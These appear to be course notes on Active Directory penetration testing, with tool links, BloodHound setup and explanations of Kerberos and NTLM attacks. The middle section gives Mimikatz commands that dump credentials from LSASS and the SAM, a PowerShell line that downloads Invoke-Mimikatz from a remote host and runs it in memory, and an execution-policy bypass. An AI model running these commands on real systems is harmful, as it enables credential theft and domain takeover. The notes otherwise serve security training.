Active Directory Pentesting Full Course – Red Team Hacking

winpeas (Winpeas has watson embedded)

Github repos of exploits:

• https://github.com/nomi-sec/PoC-in-GitHub

• https://github.com/abatchy17/WindowsExploits

• https://github.com/SecWiki/windows-kernel-exploits

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

PS C:AD> Import-Module .Sherlock.ps1

PS C:AD> Find-AllVulns

Recommended Windows Hack The Box machines to Practice Privilege Escalation

Regretably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read, not your typical privilege escalation).

• Chatterbox

• Jeeves

• Access

• Active

• SecNotes

Good Read:

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0

https://github.com/sense-of-security/ADRecon

.ADRecon.ps1 -OutputType HTML

Download Bloodhound GUI

https://github.com/BloodHoundAD/BloodHound/releases

Download and install Java

https://www.java.com/en/download/

Download JDK

https://jdk.java.net/archive/

setx -m JAVA_HOME "C:ADBloodhoundjdk-11.0.9"

Download Neoj4

https://neo4j.com/download-center/#community

neo4j.bat install-service

neo4j-admin set-initial-password yourpasswordhere

neo4j.bat start

neo4j.bat stop

Download SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

powershell -ep bypass

import-module .SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting

BloodHound Website

https://bloodhound.readthedocs.io/en/latest/index.html

LSA and SAM

https://networkencyclopedia.com/local-security-authority-lsa/

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets

https://www.windows-active-directory.com/windows-security-account-manager.html

Dumping NTLM Hashes from SAM using Mimikatz

https://joshdawes.com/dumping-ntlm-hashes-from-sam-using-mimikatz/

Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz -DumpCreds -ComputerName target1.example.org

#Elevate Privileges to extract the credentials

privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins

token::elevate

#Extract from lsass (memory)

sekurlsa::logonpasswords

#Extract from SAM

lsadump::sam

#One liner

Invoke-Mimikatz -Command "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')

Invoke-Mimikatz -DumpCreds #Dump creds from memory

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

https://book.hacktricks.xyz/windows/stealing-credentials#dump-lsa-secrets

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).   

#Download Inveigh here:

https://github.com/Kevin-Robertson/InveighZero

https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/

https://book.hacktricks.xyz/windows/stealing-credentials

More on ACL:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It's created automatically when a new domain is created. It cannot be deleted. its name cannot be changed. it cannot be enabled.

KDC service handles all Kerberos ticket requests so KRBTGT account in AD plays a key role that encrypts and sign all Kerberos tickets for the domain.

Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.

Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services.

When it is configured, constrained delegation restricts the services to which the specified server can act on the behalf of a user.

This requires domain administrator privileges to configure a domain account for a service and is restricts the account to a single domain.

In today's enterprise, front-end services are not designed to be limited to integration with only services in their domain.

You need to have GenericAll or GenericWrite to set the SPN

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message.

This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.